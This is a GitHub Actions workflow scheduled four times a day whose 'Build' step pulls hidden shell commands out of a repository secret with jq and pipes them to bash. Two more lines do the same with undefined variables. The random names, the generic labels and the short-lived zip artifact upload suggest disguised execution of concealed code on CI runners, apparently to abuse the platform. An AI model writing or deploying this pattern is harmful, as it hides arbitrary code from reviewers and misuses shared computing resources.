name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '8 3,9,15,21 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  operation:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build
        env:
          wwdb56: ${{ secrets.wwdb56 }}
        run: |
          printf '%s' "$wwdb56" | jq -r .l835 | /bin/bash
          echo $odiz9196 | jq -r .apm696 | /bin/bash
          printf '%s' "$uyf42457" | jq -r .hafp85295 | /bin/bash

      - name: Archive output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: caLBOHTM
          path: "*.zip"
          retention-days: 1
